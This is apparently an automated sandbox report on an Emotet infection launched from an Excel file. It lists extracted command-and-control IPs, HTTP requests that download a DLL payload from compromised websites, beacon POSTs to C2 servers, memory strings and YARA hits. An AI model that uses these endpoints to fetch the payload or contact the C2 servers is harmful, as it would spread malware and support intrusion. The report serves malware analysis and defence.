                        Source: Malware configuration extractorIPs: 103.254.12.236:7080
                        Source: Malware configuration extractorIPs: 185.148.169.10:8080
                        Source: Malware configuration extractorIPs: 165.22.254.236:8080
                        Source: Malware configuration extractorIPs: 37.44.244.177:8080
                        Source: Malware configuration extractorIPs: 54.37.228.122:443
                        Source: Malware configuration extractorIPs: 51.75.33.122:443
                        Source: Malware configuration extractorIPs: 128.199.217.206:443
                        Source: Malware configuration extractorIPs: 188.165.79.151:443
                        Source: Malware configuration extractorIPs: 210.57.209.142:8080
                        Source: Malware configuration extractorIPs: 160.16.143.191:8080
                        Source: Malware configuration extractorIPs: 175.126.176.79:8080
                        Source: Malware configuration extractorIPs: 202.134.4.210:7080
                        Source: Malware configuration extractorIPs: 103.126.216.86:443
                        Source: Malware configuration extractorIPs: 190.145.8.4:443
                        Source: Malware configuration extractorIPs: 128.199.242.164:8080
                        Source: Malware configuration extractorIPs: 64.227.55.231:8080
                        Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                        Source: global trafficHTTP traffic detected: POST /kwxkonang/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 357Host: 218.38.121.17
                        Source: global trafficHTTP traffic detected: POST /tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 280Host: 218.38.121.17
                        Source: Joe Sandbox ViewIP Address: 172.105.115.71 172.105.115.71
                        Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                        Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49184 version: TLS 1.0
                        Source: global trafficHTTP traffic detected: GET /wp-admin/4m1WxDxza6D8SVrfF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hsweixintp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /admin002vqimbe/hRFZkkzLIl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stickers-et-deco.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/cXEhHssszV/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.cecambrils.catConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-includes/d6tkyFFBNwY/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.clinicaportalpsicologia.com.brConnection: Keep-Alive
                        Source: unknownNetwork traffic detected: IP country count 21
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Nov 2022 04:43:18 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Powered-By: PrestaShopStatus: 404 Not FoundSet-Cookie: PrestaShop-76bfdce226b740dc1298019a18e61155=454f5619c2242a2b3d522efeae2f6c48a578aba8c10278d9f2d8899a3fcad222%3A7VXP1JRg6sMvuxPANoFERLi7pCnrxsYqh8BZef4CZlrnQztM92Sg9jLq7GIDevQzzQ9P0reTobhVinLo3QJBWkBFdKI37ltxfwgwuTELet01SKQ4bMLcAdkfSwCEuWEVYtW0yeVouVHIO8jPqvQEHfrz8a8OziW2SVas17jQLdQ%3D; expires=Tue, 06-Dec-2022 04:43:18 GMT; Max-Age=1728000; path=/; domain=www.stickers-et-deco.com; httponlyVary: User-AgentConnection: keep-alive, Keep-AliveKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 61 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 20 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 22 20 6c 61 6e 67 3d 22 66 72 2d 66 72 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 69 65 37 22 20 6c 61 6e 67 3d 22 66 72 2d 66 72 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 69 65 38 22 20 6c 61 6e 67 3d 22 66 72 2d 66 72 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 39 22 20 6c 61 6e 67 3d 22 66 72 2d 66 72 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 66 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c Data Ascii: 5a11<!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]--> <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]--> <!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]--><html lang="fr-fr"><head><meta charset="utf-8" /><titl
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Nov 2022 04:39:49 GMTServer: ApacheStrict-Transport-Security: max-age=63072000;X-Content-Type-Options: nosniffLast-Modified: Wed, 04 Jul 2018 11:59:53 GMTETag: "400-5702b2b206040"Accept-Ranges: bytesContent-Length: 1024X-Powered-By: PleskLinKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 63 65 63 61 6d 62 72 69 6c 73 2e 63 61 74 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d
                        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 16 Nov 2022 04:43:21 GMTServer: ApacheContent-Length: 380Keep-Alive: timeout=5, max=500Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                        Source: 4DF60000.0.drString found in binary or memory: http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                        Source: 4DF60000.0.drString found in binary or memory: http://www.cecambrils.cat/wp-content/cXEhHssszV/
                        Source: 4DF60000.0.drString found in binary or memory: http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                        Source: 4DF60000.0.drString found in binary or memory: http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/
                        Source: regsvr32.exe, 00000006.00000003.1002662490.0000000000381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/kwxkonang/
                        Source: regsvr32.exe, 0000000B.00000003.1150324980.0000000000271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://115.178.55.22:80/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/
                        Source: regsvr32.exe, 00000006.00000003.1015548706.0000000000379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/kwxkonang/
                        Source: regsvr32.exe, 0000000B.00000003.1163475701.0000000000270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/
                        Source: regsvr32.exe, 00000006.00000003.1034450302.000000000037C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1193565866.000000000037C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/kwxkonang/
                        Source: regsvr32.exe, 0000000B.00000002.1193461003.000000000026E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/
                        Source: regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                        Source: unknownHTTP traffic detected: POST /kwxkonang/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 357Host: 218.38.121.17
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dllJump to behavior
                        Source: unknownDNS traffic detected: queries for: hsweixintp.com
                        Source: global trafficHTTP traffic detected: GET /wp-admin/4m1WxDxza6D8SVrfF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hsweixintp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /admin002vqimbe/hRFZkkzLIl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stickers-et-deco.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/cXEhHssszV/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.cecambrils.catConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-includes/d6tkyFFBNwY/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.clinicaportalpsicologia.com.brConnection: Keep-Alive

                        E-Banking Fraud

                        barindex
                        Yara detected Emotet
                        Source: Yara matchFile source: 0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1193452350.00000000002FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 11.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1193544536.0000000002031000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
